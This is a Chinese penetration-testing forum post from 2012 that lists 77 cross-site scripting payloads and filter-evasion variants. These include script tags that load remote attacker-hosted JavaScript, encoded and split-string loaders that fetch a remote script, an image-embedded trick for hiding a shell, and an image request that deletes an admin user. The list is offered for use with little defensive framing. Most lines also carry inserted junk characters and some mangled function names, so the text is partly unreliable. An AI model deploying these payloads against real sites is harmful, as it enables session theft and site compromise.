中国网络渗透测试联盟

标题: xss详细利用大全1 [打印本页]

作者: admin    时间: 2012-9-13 17:04
标题: xss详细利用大全1
跨站图片shell
& Y( B, ^/ @7 _( o7 z. V5 gXSS跨站代码  <script>alert("")</script>
* X( S! _( x0 H& B+ g4 T7 _: w; G& G4 ~8 Q( G* |
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
3 N( M, n3 b- Q' t% y3 E4 e- Q% j
1 G8 w+ y! j) b( u1 ?* t9 e% `5 A+ ~, W/ ]# s" N% j

0 ]) r! `; W7 C* i& j) V1)普通的XSS JavaScript注入. b4 L9 l8 I5 \, f# k
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>( ~$ ~" @/ U8 ]6 o

. c' ^6 }$ t4 c8 c# I(2)IMG标签XSS使用JavaScript命令
4 b" h( m' }% r" s. }/ Y7 ^<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, p/ R& d- D3 b* [8 r

3 Y4 P$ I0 Q. u* _! X. H- s/ _6 l5 o(3)IMG标签无分号无引号
2 U2 E$ y1 B/ p: T* p: Y( e<IMG SRC=javascript:alert(‘XSS’)>
/ x# `1 p& s" i. U. V3 U
/ h( m  ]: ]- t  O1 \$ X(4)IMG标签大小写不敏感" K0 v4 c2 K, j& `
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>6 s* ]; {" [2 z* Z* b0 \

# m: _& d! ^0 l9 s(5)HTML编码(必须有分号)
7 J3 G/ ~* G) B& C; X+ ]<IMG SRC=javascript:alert(“XSS”)>7 E1 ^; B/ k/ |7 `( v) R- B: c7 J
2 p  ~6 \* [  W% C$ s/ ?
(6)修正缺陷IMG标签
# ]1 }9 e- o% H' R* ~$ g' n<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>+ y- |# I8 h$ X3 H  O7 O8 i6 v
% @5 O, N. x" L
(7)formCharCode标签(计算器)
1 N% }6 T7 }" D<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
( j7 Z5 ?: h6 c2 Q& g: @, l6 ]5 P( }1 P: U" u
(8)UTF-8的Unicode编码(计算器)
8 J, p$ M0 s. Y% z' _; ]! O/ y' ]<IMG SRC=jav..省略..S')>% o: C( k$ `! d3 D1 i; r

7 @6 L0 k: N+ B(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
# S8 E1 {) E$ ?, w$ S<IMG SRC=jav..省略..S')>
' o! Z7 x( K) B* t! c3 \+ g' i# r: Z
) w, E# W; R* L7 x5 `* }' h(10)十六进制编码也是没有分号(计算器)
. f2 ~3 y; }. K+ E<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
# n' M" l0 M, H; ?) Y# |6 Q
- g% |. C  M2 X9 o' s0 P1 F9 t/ q(11)嵌入式标签,将Javascript分开
: ~) R$ b7 W8 J& }2 g6 t<IMG SRC=”jav ascript:alert(‘XSS’);”>, R; e9 y- Y9 a& J, v0 u; I* a8 _3 T
7 b$ A0 d6 f. J+ ^1 j+ E
(12)嵌入式编码标签,将Javascript分开
! d' u( s) y; Q+ I8 x$ ~0 e<IMG SRC=”jav ascript:alert(‘XSS’);”>0 i' P5 i! w+ u

" ]. {# R3 a- |& y2 @(13)嵌入式换行符$ ]6 t. \- n* ~2 T0 ~
<IMG SRC=”jav ascript:alert(‘XSS’);”>
* O. A" N+ X# Y/ D% C) u4 q- C6 c* b4 e) L# D% r
(14)嵌入式回车3 D9 `3 d! f' R+ W3 @: ?
<IMG SRC=”jav ascript:alert(‘XSS’);”>
  _6 i& W/ L8 H+ G
* C6 g* j! F% b$ [: q3 w% n" z0 {(15)嵌入式多行注入JavaScript,这是XSS极端的例子
& E  G8 A7 j# C5 l- |' r( Y) O& R<IMG SRC=”javascript:alert(‘XSS‘)”>. Y/ T$ w7 F; P9 |4 n+ q! b

0 R; e6 N* y% S9 w1 U- U3 a(16)解决限制字符(要求同页面); K# a& i3 c1 x8 D0 M% w
<script>z=’document.’</script>1 m# @) m- K* \( f9 y8 f: C
<script>z=z+’write(“‘</script>$ P$ T7 N7 U: \
<script>z=z+’<script’</script>" e5 A! E6 M: O7 t' B
<script>z=z+’ src=ht’</script>) r% R) l& D! K# Q! s' ^4 \
<script>z=z+’tp://ww’</script>
5 s+ x! D* j5 G, ]0 t8 F<script>z=z+’w.shell’</script>
0 c- j+ C  q% {& y% R# ?  ^% H<script>z=z+’.net/1.’</script>
7 Y' X$ d5 S: Q<script>z=z+’js></sc’</script># i' p1 m* Z% ^2 t  [9 `/ C
<script>z=z+’ript>”)’</script>
- ~' {& v' p, R0 H4 t* D# ^<script>eval_r(z)</script>
# s4 s  r+ Z" t6 ~# J* b" H. o9 O* C% `6 A( T- V0 F5 F
(17)空字符
. T6 ]# d7 K5 s4 W' Y. t, zperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out+ B3 z2 V: \0 s( x' ^

* K' X; }) J# ~(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
! `7 x, J+ x- l# i7 m* O1 Y8 ^perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out6 k1 N* D( @9 c, t  _

& z# K) G4 k( F; f% V6 l# n(19)Spaces和meta前的IMG标签9 w' |' |; x+ ~
<IMG SRC=” javascript:alert(‘XSS’);”>
/ r" O! C/ \" M% Q" P  `) F" R4 h4 i7 x
(20)Non-alpha-non-digit XSS+ n3 J! H& Y7 H7 f% |: Z
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>6 h1 h- y0 g: [' [+ p8 @

4 Q5 I8 e0 {* @0 J(21)Non-alpha-non-digit XSS to 2
+ f0 h. n/ J3 D$ e3 Q<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
# c+ f8 U( T2 M9 |( @( M1 K5 U  m, D# \7 X
(22)Non-alpha-non-digit XSS to 3. l3 i/ m+ M# R
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>2 @2 D) \$ m( W! i0 }# G- P1 p

3 {6 [& t0 a9 f& f7 e2 r(23)双开括号% x8 f) d( {5 R  j' R
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
$ ~' {$ n$ R# p9 T% E# B0 D6 D: t' X; X, K
(24)无结束脚本标记(仅火狐等浏览器)
% l7 T: ]9 \  e( F% c% ^<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
# k$ H; {# e- d; c5 G2 }9 W3 C4 e' Q9 K% l$ x
(25)无结束脚本标记2
2 G' d- Y) [$ e2 n" v' ^* l<SCRIPT SRC=//3w.org/XSS/xss.js>
5 B/ A8 Q1 v4 w; F1 k+ W/ O
/ D; w8 ?* v, U(26)半开的HTML/JavaScript XSS
) D5 N1 C- u! R' B# `. _<IMG SRC=”javascript:alert(‘XSS’)”
% m: E1 L: n! t; s# T2 c% v' e) x- s. m3 p) r7 t% s1 r. W
(27)双开角括号
: F6 R9 a6 M. c$ U<iframe src=http://3w.org/XSS.html <- ?: H6 x' B7 ^1 s8 l

' G: g/ S& l# P; [# h(28)无单引号 双引号 分号
& E6 W6 }* `# V( A3 e$ W  M<SCRIPT>a=/XSS/5 z& x' \1 b* w# S: q
alert(a.source)</SCRIPT># y4 a8 k8 ?, o5 k* o

3 {3 T( R6 ?1 v4 ]9 w/ z- }, F(29)换码过滤的JavaScript' }" E  ~- w3 V! b6 W+ b; a
\”;alert(‘XSS’);//
5 E- V% {$ e3 `* S8 m% G- U( j$ W! m
3 b# }. d4 p; ~( _/ X$ z6 @. h(30)结束Title标签; U6 l% w4 n- m2 l+ c9 Z2 P
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>& V$ @5 O, q% q  ~- a
3 s" A" G! H* A% v6 x
(31)Input Image8 ~! C+ q4 y" {$ X0 ]) O
<INPUT SRC=”javascript:alert(‘XSS’);”>
6 |* w# J& o; o, R6 t8 ~8 O0 t) ^! h4 L7 R5 T; h' k7 T
(32)BODY Image& E9 q( {$ m! H3 {# O5 Q
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
# c+ t9 y: f3 z& {3 w1 `% ^; ~7 e1 |9 n
(33)BODY标签, ^5 Q. Z: L1 [+ m* c# h" v
<BODY(‘XSS’)>
' E2 p5 ~  D' P! u- K- t* D- Y
6 G* E& Y0 ]$ u$ }4 w4 b2 I  X(34)IMG Dynsrc2 M. U: k; Q: {( m; [- o7 }
<IMG DYNSRC=”javascript:alert(‘XSS’)”>3 [2 ?" v6 p5 I) Y3 B$ }5 y

: O8 D% C8 s( L- N7 r! w(35)IMG Lowsrc
! \$ _/ K) ^- t9 P<IMG LOWSRC=”javascript:alert(‘XSS’)”>
  `  B! z+ s! ^7 c4 e) U( ?% n) S  ?* |6 _) o0 F! I
(36)BGSOUND+ J: l0 e8 E2 t& k
<BGSOUND SRC=”javascript:alert(‘XSS’);”>- W# A. W) [0 G* e! g1 \, p& o

  _2 K1 y: ?5 n8 y(37)STYLE sheet3 g+ `3 K- V9 T) Z, K% g% D
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
& v: m! }. \6 i$ q# k5 A' L0 o  p6 M& D: Z! d2 ~1 R9 [: x, C
(38)远程样式表
0 e) F7 L. T$ |7 n  i; c<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”># N: m! o2 b$ ?+ I) ^+ F: ~

- ~% J# x5 H$ c+ v1 Q(39)List-style-image(列表式): ?7 v' {- f# x- k
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS1 Y6 [- P. ~2 l  f' e
3 d6 n$ ?$ U5 _
(40)IMG VBscript
! ?; p' p$ S$ z% ^2 ~<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
% A6 h( i3 }) g1 F2 `
( E3 X* w5 P2 H/ c4 f/ b5 Z: ?( _(41)META链接url
4 {8 w  ?2 @5 U7 O# E3 e<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
1 U! U* @% v: [1 M2 x9 l- J7 _/ I7 c
(42)Iframe8 ?- d+ A- U# ?! }5 ~
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
7 x9 ~8 z+ M* U6 f(43)Frame' |* {) a! r+ G3 l
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>9 `3 n/ E2 Y1 P, t5 j- ?
7 n8 X5 r) Y; n7 D0 E' n
(44)Table
0 Y  d( {; H0 W- @  L5 D<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>& O' M4 d8 s7 R# s* e
) m* }. T! v  T) L
(45)TD
' z5 J4 I  \$ k# J6 O3 X8 r<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 k- L1 k4 R* l* z$ E* D) i* i) O- G! F3 m
(46)DIV background-image
0 N9 u! W( _# d<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
% _4 J% e, f* I, L4 O5 }
8 U: T. r9 R- R/ b5 T! E% L(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
8 H: V# L: w5 K) L$ v' ?<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
, n; E6 ?( s. d% t7 t- m5 N
/ f6 H( D3 C3 |2 _. f/ g(48)DIV expression
( s' W2 x6 c. T- l- T' E9 q0 Q1 h+ d! Y<DIV STYLE=”width: expression_r(alert(‘XSS’));”>5 j1 y" Z" \) [* J
; T, R5 P) p/ ^9 p/ n
(49)STYLE属性分拆表达' a3 u5 c. s" S
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>  s$ R: \: D' x; r$ r: T6 d

! W( a) f' C8 S! P+ y/ V3 a& M) p(50)匿名STYLE(组成:开角号和一个字母开头)- m$ x  ^) F4 [0 i1 A2 J: A- }
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" K" a0 U9 B$ B$ a0 P! S( j. I. F$ o* L4 ]6 v' d
(51)STYLE background-image+ O4 e2 \4 A1 t% {6 u
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
- U0 S9 ]* J0 ]1 ?( }8 f; \* Z* r6 K. v
(52)IMG STYLE方式  {# q) \- e+ @) w
exppression(alert(“XSS”))’>$ @" N! K4 U# v8 q9 ^

7 ^' I+ M" |- s0 c6 v* F+ z(53)STYLE background
, |$ p0 Q$ A0 g3 ?, ~, B<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
' z% f4 u; k% W7 j: g' ?  g1 B$ V" h1 R0 Q
(54)BASE8 z$ K7 @1 C; S
<BASE HREF=”javascript:alert(‘XSS’);//”>
( l7 g2 l$ C3 S& i9 p& c- G8 A4 d
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
% o  t# Y1 l6 W2 k8 y- t' O<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
4 S  U" `! b7 g" z
9 g- d$ ?  s/ F6 A, r- }(56)在flash中使用ActionScrpt可以混进你XSS的代码
! F( X+ D. a9 M8 w/ D) t; ^; Oa=”get”;- s0 {- C; q/ g7 K2 f. C
b=”URL(\”";# s7 Y+ Q) l, c, g6 W7 c7 U, M1 J
c=”javascript:”;
+ ?* u6 S+ |% j5 V5 u  nd=”alert(‘XSS’);\”)”;& R$ Y7 N5 z0 D) G
eval_r(a+b+c+d);
) q  v# N& j4 g8 m
& o) b& B* S: q3 G(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
" Q# O& P) V+ t- O: e# c<HTML xmlns:xss>
- H: @: h0 p& N<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
) q: z' [1 M5 k/ d- e/ O- c$ c<xss:xss>XSS</xss:xss>
& j+ j# @, }6 ~' Q8 w</HTML>8 [$ t5 R9 @* y; b" h
! j5 m1 w8 g$ K9 L% M$ ]/ R& p
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用  ?4 N$ R) Z8 v) V- \* H6 ~3 \
<SCRIPT SRC=””></SCRIPT>9 |5 b1 e- P: B4 ^  U6 A6 m

8 Y% i) ]1 Y- w9 ~(59)IMG嵌入式命令,可执行任意命令' H5 @+ X- f: [' j  Q
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
1 o, U6 W$ }4 D8 f5 P6 Y, H8 N
- G7 d/ m- c' E& p5 i(60)IMG嵌入式命令(a.jpg在同服务器)
+ w/ b! a8 @- r: B* rRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser- E7 C2 x% P( _8 b

& G/ j/ k; f& L$ q1 e8 p/ P" o(61)绕符号过滤
/ V6 B3 x1 c7 S5 w7 i1 d<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>1 f% y% C" @1 B( O( i' L. e8 z

" z* E/ K3 k% ], D2 l! j(62)6 m2 ?6 C. ?0 _4 v; V
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
* N: C: v6 O0 _% w
% q  y9 s" n  v(63)
5 E( k& u7 W& n) |: [. [! t5 K, Z<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
' @( Z2 l: z" W2 n2 n0 Q! F1 r8 L3 G: Z) V
(64)
9 U; Z" m& n; {/ q' h<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>+ ]( F/ m) y1 p* |; e

0 A! \# |, N6 c1 z: s2 ~! B& h(65), ]  @( J5 F7 H2 @' g) n
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
3 s2 n+ c/ \$ r9 \" ]9 c1 O. F( ?* d, X. K) P" T! W
(66)1 X0 d5 T- ]- O* l+ Z( Z- A. A% p0 P
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>3 {7 t9 A( ^) _

  ]/ E  R8 y6 C* f7 p3 g/ o(67)# k; D5 i  r+ G- m
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
. G. k; T7 h4 @! `' q* [+ Y9 E) o% Q
; `8 w; n" B# c$ ^, D(68)URL绕行
/ u$ r* I0 e; ^, q. G, @6 |; [<A HREF=”http://127.0.0.1/”>XSS</A>2 \8 s2 W& O3 z3 K' w
: g$ g8 C% h& I% W4 y. i' |4 h5 q
(69)URL编码; t3 t3 `% Q: S: O1 v) e
<A HREF=”http://3w.org”>XSS</A>5 Z* i4 E7 K- @# c( k
/ d3 u" }- R5 }4 E
(70)IP十进制
3 T% w# R2 E0 Z+ Q<A HREF=”http://3232235521″>XSS</A>0 L' F' ?2 R7 E# ]# a' X( v
" v* }& |0 Z$ d5 u1 s9 W
(71)IP十六进制
" D) Y( |: l# Y) b+ p  w<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>$ g7 d+ W6 o( E: C1 O7 O! n8 D
8 j+ M* c' x6 R* I- [
(72)IP八进制) m; |- L2 a: y8 Y+ {4 j* c& O! T$ w
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
$ `4 l/ @/ P8 c4 X5 P$ F
' f# q0 N# @4 a(73)混合编码
- ^2 F- p  N/ n- _. j8 H( e! f<A HREF=”h
- G8 [% r* W+ \  f8 c, F; `7 q3 E" [tt p://6 6.000146.0×7.147/”">XSS</A>7 n. p) A' F. n9 o) K+ q7 Z
! H( L4 Y% L' _. I
(74)节省[http:]! I, u9 p+ E; ?8 `4 P% T
<A HREF=”//www.google.com/”>XSS</A>
6 l5 f4 x1 T# |0 a9 |8 s- p9 f* z) h! s# \
(75)节省[www], G. x( n* x* }% l+ f: d
<A HREF=”http://google.com/”>XSS</A>" }! Z6 I& m$ b: E
+ S7 z# d  q% d: D/ T
(76)绝对点绝对DNS
5 c0 {/ b2 Q$ b' h( A<A HREF=”http://www.google.com./”>XSS</A>
% X: W( _% G6 B1 u6 _- p7 @$ r3 r% ^5 R+ K) M
(77)javascript链接  k: I9 f7 [( [, d! }; w
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>* e& w) L# o$ d0 {. x





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2